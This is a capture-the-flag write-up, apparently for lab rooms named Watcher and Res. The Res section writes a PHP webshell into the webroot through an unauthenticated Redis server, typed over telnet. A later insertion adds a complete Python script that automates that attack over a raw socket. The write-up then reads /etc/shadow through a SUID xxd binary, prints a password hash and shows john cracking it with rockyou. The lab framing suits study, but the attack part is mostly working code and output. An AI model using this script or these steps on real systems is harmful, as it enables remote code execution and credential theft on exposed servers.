watcher, it was okay but nothing to write about. We had LFI to get FTP creds, upload a PHP reverse shell using the FTP account, then include it for RCE, then a few different things to move between users but nothing exciting.

Res
Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!
This was a Redis box, pretty simple. I mostly want to record the RCE step, which wasn't guided. I followed this like so, with telnet:
└─# telnet 10.10.1.20 6379
Connected to 10.10.1.20.
Escape character is '^]'.
config set dir /var/www/html
config set dbfilename cmd.php
set test "<?php system($_GET['cmd']);?>"
save
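The same write-a-webshell-through-RDB trick as a script, added here as an example and not part of the original writeup or the room. It speaks RESP directly over a raw socket (no redis-py needed), checks that every step answers +OK, and includes the SAVE that actually flushes the keyspace to the configured file; without it nothing lands on disk. The host, port, webroot and key name are assumptions for illustration. Note that the resulting file is a whole RDB dump with binary header and footer around the PHP tag; PHP just echoes those bytes as garbage and still executes the tag, which is why this works, and why the web server user must be able to read whatever redis writes.

```python
import socket
import urllib.parse

# Assumed target details for the example; the writeup used 10.10.1.20:6379.
TARGET_HOST = "10.10.1.20"
TARGET_PORT = 6379
WEBROOT = "/var/www/html"      # must be writable by the redis user
SHELL_NAME = "cmd.php"
PHP_WEBSHELL = "<?php system($_GET['cmd']); ?>"


def resp_command(*args: str) -> bytes:
    """Encode one command as a RESP array of bulk strings (what redis-cli sends).

    Inline commands as typed into telnet work too, but RESP is unambiguous when
    an argument contains spaces or quotes, as the PHP payload does.
    """
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        out.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(out)


def webshell_commands(webroot=WEBROOT, filename=SHELL_NAME, php=PHP_WEBSHELL):
    """The four commands that turn an unauthenticated Redis into a PHP webshell."""
    return [
        resp_command("CONFIG", "SET", "dir", webroot),
        resp_command("CONFIG", "SET", "dbfilename", filename),
        resp_command("SET", "payload", php),   # key name is arbitrary
        resp_command("SAVE"),                  # writes webroot/filename to disk
    ]


def parse_simple_reply(data: bytes) -> str:
    """Parse a single RESP simple-string (+OK) or error (-ERR ...) reply."""
    line, _, _ = data.partition(b"\r\n")
    if line.startswith(b"+"):
        return line[1:].decode()
    if line.startswith(b"-"):
        raise RuntimeError(line[1:].decode())
    raise ValueError(f"unexpected reply: {line!r}")


def cmd_url(base_url: str, shell_cmd: str) -> str:
    """URL that runs shell_cmd through the dropped webshell (fully URL-encoded)."""
    return f"{base_url}/{SHELL_NAME}?cmd={urllib.parse.quote(shell_cmd, safe='')}"


def deploy(host=TARGET_HOST, port=TARGET_PORT, timeout=5.0) -> str:
    """Send the commands over a raw socket, insisting on +OK for each step.

    A -ERR on SAVE almost always means the dir is not writable by redis.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for command in webshell_commands():
            sock.sendall(command)
            reply = parse_simple_reply(sock.recv(4096))
            if reply != "OK":
                raise RuntimeError(f"{command!r} -> {reply}")
    return cmd_url(f"http://{host}", "id")


if __name__ == "__main__":
    print(deploy())
```

From the printed URL, swap `id` for the reverse shell one-liner; `cmd_url` percent-encodes it so the shell metacharacters survive the query string.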
From there I used the Python reverse shell. Privesc was via the SUID bit on xxd to read /etc/shadow and crack the password for our user from the sudoers group:
www-data@ubuntu:/dev/shm$ LFILE=/etc/shadow
www-data@ubuntu:/dev/shm$ xxd "$LFILE" | xxd -r
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::
Which I then ran through john:
└─# john hash -w=/usr/share/wordlists/rockyou.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beautiful1       (?)
1g 0:00:00:00 DONE (2021-02-19 03:58) 1.754g/s 2245p/s 2245c/s 2245C/s kucing..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Anyway, the Redis part was the relevant bit.